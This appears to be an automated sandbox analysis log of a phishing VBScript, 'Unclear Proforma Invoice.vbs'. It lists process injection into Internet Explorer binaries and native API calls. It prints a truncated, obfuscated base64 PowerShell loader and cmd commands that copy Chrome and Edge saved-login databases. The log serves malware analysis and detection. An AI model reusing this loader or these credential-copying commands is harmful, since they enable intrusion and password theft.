Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF51FC6 21_2_1EF51FC6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5EFBF 21_2_1EF5EFBF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5FF63 21_2_1EF5FF63
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEACF00 21_2_1EEACF00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFCE0 21_2_1EEBFCE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF27CE8 21_2_1EF27CE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF6ACEB 21_2_1EF6ACEB
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB8CDF 21_2_1EEB8CDF
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF39C98 21_2_1EF39C98
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3C60 21_2_1EEA3C60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5EC60 21_2_1EF5EC60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF56C69 21_2_1EF56C69
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4EC4C 21_2_1EF4EC4C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEAAC20 21_2_1EEAAC20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE90C12 21_2_1EE90C12
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF3FDF4 21_2_1EF3FDF4
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA9DD0 21_2_1EEA9DD0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB2DB0 21_2_1EEB2DB0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0D69 21_2_1EEA0D69
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF57D4C 21_2_1EF57D4C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5FD27 21_2_1EF5FD27
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AD00 21_2_1EE9AD00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBFAA0 21_2_1EEBFAA0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5FA89 21_2_1EF5FA89
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5EA5B 21_2_1EF5EA5B
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5CA13 21_2_1EF5CA13
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF14BC0 21_2_1EF14BC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5FB2E 21_2_1EF5FB2E
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEDDB19 21_2_1EEDDB19
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0B10 21_2_1EEA0B10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF578F3 21_2_1EF578F3
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA28C0 21_2_1EEA28C0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF518DA 21_2_1EF518DA
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF198B2 21_2_1EF198B2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEB6882 21_2_1EEB6882
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE86868 21_2_1EE86868
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF15870 21_2_1EF15870
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5F872 21_2_1EF5F872
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA9870 21_2_1EEA9870
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBB870 21_2_1EEBB870
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40835 21_2_1EF40835
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA3800 21_2_1EEA3800
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECE810 21_2_1EECE810
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEE59C0 21_2_1EEE59C0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9E9A0 21_2_1EE9E9A0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5E9A6 21_2_1EF5E9A6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5F6F6 21_2_1EF5F6F6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9C6E0 21_2_1EE9C6E0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF136EC 21_2_1EF136EC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5A6C0 21_2_1EF5A6C0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0680 21_2_1EEA0680
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC4670 21_2_1EEC4670
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4D646 21_2_1EF4D646
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF3D62C 21_2_1EF3D62C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBC600 21_2_1EEBC600
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA2760 21_2_1EEA2760
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEAA760 21_2_1EEAA760
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF56757 21_2_1EF56757
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0D480 21_2_1EF0D480
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA0445 21_2_1EEA0445
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF575C6 21_2_1EF575C6
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5F5C9 21_2_1EF5F5C9
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF6A526 21_2_1EF6A526
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8D2EC 21_2_1EE8D2EC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5124C 21_2_1EF5124C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE91380 21_2_1EE91380
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF5F330 21_2_1EF5F330
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEAE310 21_2_1EEAE310
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF570F1 21_2_1EF570F1
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEAB0D0 21_2_1EEAB0D0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE900A0 21_2_1EE900A0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED508C 21_2_1EED508C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4E076 21_2_1EF4E076
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBB1E0 21_2_1EEBB1E0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA51C0 21_2_1EEA51C0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEE717A 21_2_1EEE717A
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF3D130 21_2_1EF3D130
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF6010E 21_2_1EF6010E
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8F113 21_2_1EE8F113
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_02EBDEAE 21_2_02EBDEAE
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EF0E692 appears 86 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EF1EF10 appears 105 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EEE7BE4 appears 96 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EE8B910 appears 268 times
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: String function: 1EED5050 appears 36 times
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2ED0 NtResumeThread,LdrInitializeThunk, 21_2_1EED2ED0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2E50 NtCreateSection,LdrInitializeThunk, 21_2_1EED2E50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2F00 NtCreateFile,LdrInitializeThunk, 21_2_1EED2F00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2CF0 NtDelayExecution,LdrInitializeThunk, 21_2_1EED2CF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2C50 NtUnmapViewOfSection,LdrInitializeThunk, 21_2_1EED2C50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2C30 NtMapViewOfSection,LdrInitializeThunk, 21_2_1EED2C30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 21_2_1EED2DC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2D10 NtQuerySystemInformation,LdrInitializeThunk, 21_2_1EED2D10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2A80 NtClose,LdrInitializeThunk, 21_2_1EED2A80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2BC0 NtQueryInformationToken,LdrInitializeThunk, 21_2_1EED2BC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B90 NtFreeVirtualMemory,LdrInitializeThunk, 21_2_1EED2B90
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED29F0 NtReadFile,LdrInitializeThunk, 21_2_1EED29F0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED34E0 NtCreateMutant,LdrInitializeThunk, 21_2_1EED34E0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2EC0 NtQuerySection, 21_2_1EED2EC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2EB0 NtProtectVirtualMemory, 21_2_1EED2EB0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2E80 NtCreateProcessEx, 21_2_1EED2E80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2E00 NtQueueApcThread, 21_2_1EED2E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2FB0 NtSetValueKey, 21_2_1EED2FB0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2F30 NtOpenDirectoryObject, 21_2_1EED2F30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2CD0 NtEnumerateKey, 21_2_1EED2CD0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED3C90 NtOpenThread, 21_2_1EED3C90
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2C20 NtSetInformationFile, 21_2_1EED2C20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED3C30 NtOpenProcessToken, 21_2_1EED3C30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2C10 NtOpenProcess, 21_2_1EED2C10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2DA0 NtReadVirtualMemory, 21_2_1EED2DA0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2D50 NtWriteVirtualMemory, 21_2_1EED2D50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2AC0 NtEnumerateValueKey, 21_2_1EED2AC0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2AA0 NtQueryInformationFile, 21_2_1EED2AA0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2A10 NtWriteFile, 21_2_1EED2A10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2BE0 NtQueryVirtualMemory, 21_2_1EED2BE0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B80 NtCreateKey, 21_2_1EED2B80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B20 NtQueryInformationProcess, 21_2_1EED2B20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B00 NtQueryValueKey, 21_2_1EED2B00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2B10 NtAllocateVirtualMemory, 21_2_1EED2B10
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED38D0 NtGetContextThread, 21_2_1EED38D0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED29D0 NtWaitForSingleObject, 21_2_1EED29D0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED4570 NtSuspendThread, 21_2_1EED4570
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED4260 NtSetContextThread, 21_2_1EED4260
Java / VBScript file with very long strings (likely obfuscated code)
Source: Unclear Proforma Invoice.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA75.tmp" "c:\Users\user\AppData\Local\Temp\tmhd51lu\CSCDE243CA280D4B5C9E282790C554DB9.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAI